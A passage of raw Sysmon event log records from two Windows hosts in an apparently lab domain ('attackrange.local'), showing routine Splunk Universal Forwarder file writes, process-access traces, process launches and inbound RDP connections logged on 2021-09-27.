Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D15C03328709F6604D03708231CB532D,SHA256=A8367916916BB855A61B00D392969E230DF41D6B6D3E3482AAE9B763DEC0F0B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049505Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:43.947{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5844319F13F26A59D81515F0804811F5,SHA256=3A2C7EA0689102D880EF73B308BF858A5E7E227D512618955670A4D3B38AC1FE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978211Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:39.265{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-63675-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001049517Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:44.968{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33E157079DDB556EE1D3CC6255D1D682,SHA256=10DBCA4C792A6DB4B81CCEDC52AFA2FD3BE7D53B1303018A9A7977617E3021EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978213Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:44.586{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=864B7D7DB23CE6B230E5FFF6F4BFA5B9,SHA256=810397E8C827F7E218F6FE9D918D55CB2E1CD72905111C5716012126068AFAAB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049516Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:44.784{5EBD8912-8A1C-6151-1D7A-00000000FC01}67402696C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049515Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:44.700{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6CCC0519148C9D549DCBF8A13465A19B,SHA256=9C6B8A56EC1B0AC94D1248A3357209E3155766B8D75A49B1179C72631B5B2275,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049514Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:44.700{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1D135C3F8F2D52471BA7DC45FA38CAD7,SHA256=A6D6E9E8EB42BF031EAF3652CA9EAE17702C425A55DF5485E8B016C634317022,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049513Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:44.631{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8A1C-6151-1D7A-00000000FC01}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049512Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:44.631{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049511Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:44.631{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049510Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:44.631{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049509Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:44.631{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049508Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:44.631{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8A1C-6151-1D7A-00000000FC01}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049507Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:44.631{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8A1C-6151-1D7A-00000000FC01}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049506Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:44.617{5EBD8912-8A1C-6151-1D7A-00000000FC01}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049528Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:45.976{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63A37D8D29F908722EA121F99E69651A,SHA256=FAF774EF8E580FEA36A2ED1C7E49D9ABD4C74A1FEEE54E3A9386EEBD997BC2DA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978216Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:42.621{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-49374-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000978215Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:41.902{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59348-false10.0.1.12-8000- 23542300x8000000000000000978214Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:45.602{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D797A28A1DE890D9E65689420CFF50F,SHA256=33251819C9C947BF946116DF418A9394026487C9917E6F9F0454F93C2589B507,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049527Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:43.057{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-60635-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001049526Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:43.001{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-65314-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001049525Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:45.331{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8A1D-6151-1E7A-00000000FC01}1472C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049524Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:45.331{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049523Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:45.331{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049522Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:45.331{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049521Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:45.331{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049520Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:45.331{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8A1D-6151-1E7A-00000000FC01}1472C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049519Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:45.331{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8A1D-6151-1E7A-00000000FC01}1472C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049518Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:45.316{5EBD8912-8A1D-6151-1E7A-00000000FC01}1472C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000978218Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:46.617{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5624455EB6934D64FDEFC1790925FF3E,SHA256=76C990FD18F013C1121CDFC9E8070CE26B5FD0BA0F5DA8F1D51AC92F9723F2F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049537Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:46.345{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6CCC0519148C9D549DCBF8A13465A19B,SHA256=9C6B8A56EC1B0AC94D1248A3357209E3155766B8D75A49B1179C72631B5B2275,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049536Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:46.029{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8A1E-6151-1F7A-00000000FC01}6472C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049535Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:46.029{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049534Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:46.029{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049533Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:46.029{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 